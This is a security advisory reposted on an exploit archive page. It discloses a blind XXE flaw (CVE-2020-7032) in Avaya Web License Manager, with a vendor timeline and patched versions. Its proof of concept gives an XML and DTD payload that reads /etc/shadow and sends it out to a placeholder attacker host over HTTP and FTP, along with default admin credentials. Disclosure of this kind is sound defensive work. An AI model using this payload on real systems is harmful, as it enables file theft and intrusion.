exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Avaya Web License Manager XML Injection

Avaya Web License Manager XML Injection
Posted Nov 18, 2020
Authored by M. Koplin | Site sec-consult.com

Avaya Web License Manager versions 6.x, 7.0 through 7.1.3.6, and 8.0 through 8.1.2.0.0 suffer from a blind out-of-band XML external entity injection vulnerability.

tags | exploit, web
advisories | CVE-2020-7032
SHA-256 | 846c16f1bfa3ad4cac2f4e8b9518cf1ea140cb8f1f79ed380c39735e0498823b

Avaya Web License Manager XML Injection

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20201117-0 >
=======================================================================
title: Blind Out-Of-Band XML External Entity Injection (Authenticated)
product: Avaya Web License Manager
vulnerable version: 6.x, 7.0 through 7.1.3.6, 8.0 through 8.1.2.0.0
fixed version: 7.1.3.7 and 8.1.3
CVE number: CVE-2020-7032
impact: medium (6.5)
homepage: https://www.avaya.com/en/
found: 03/2020
by: M. Koplin (Office Munich)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"As a global leader in delivering superior communications experiences,
Avaya provides the most complete portfolio of software and services
for multi-touch contact center and unified communications offered on
premises, in the cloud, or a hybrid. Today's digital world centers on
communications enablement, and no other company is better positioned
to do this than Avaya."

Source: https://www.avaya.com/en/


Business recommendation:
------------------------
The vendor provides a patch for the Avaya Web License Manager which
should be installed immediately.

SEC Consult recommends to perform a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
-----------------------------------
1) Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)
This vulnerability within the Avaya Web License Manager (WebLM) allows an
authenticated user to read arbitrary files in the context of the Webserver
(Tomcat) by uploading a specially crafted XML file within the License upload
functionality. Accessible sensitive files that can be read are for example
/etc/shadow, SSH keys or other configuration files.


Proof of concept:
-----------------
1) Blind Out-Of-Band XML External Entity Injection (CVE-2020-7032)
Login as a user to https://$IP/WebLM/ and navigate to "Install License". If
WebLM has never been used before or not hardened, the default credentials are
admin:weblmadmin

Create an XML file like the following:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://$ATTACKER_IP/xxe_file.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

and a DTD file like:

<!ENTITY % d SYSTEM "file:///etc/shadow">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://$ATTACKER_IP:2121/%d;'>">

Start a webserver, e.g. SimpleHTTPServer

python -m SimpleHTTPServer 80

and an FTP server like GO XXE FTP Server

./xxeserv 2121

Upload the crafted XML file by clicking the install button.


Vulnerable / tested versions:
-----------------------------
The following version has been tested:
* Avaya Web License Manager 6.3

The vendor doesn't support versions < 7.x. Probably all versions <7 are
affected.


Vendor contact timeline:
------------------------
2020-03-18: Contacting vendor through securityalerts@avaya.com
2020-03-19: Vendor replied and started the process to verify the vulnerability
2020-04-03: Second mail to vendor to check if they have verified the issue
2020-05-18: Release of Hotfix for WebLM (embedded with SMGR) version 8.1.2.x
2020-07-01: Advisory release postponed, due to a delayed patch for version 7
2020-11-16: Patch release for version 7 and 8 of WebLM standalone and SMGR
2020-11-17: Publication of the advisory.


Solution:
---------
Version 6: Upgrade to a new major release
Version 7: Upgrade to 7.1.3.7 or later
Version 8: Install hot fix #7 or upgrade to version 8.1.3


Workaround:
-----------
None.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF M. Koplin / @2020


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close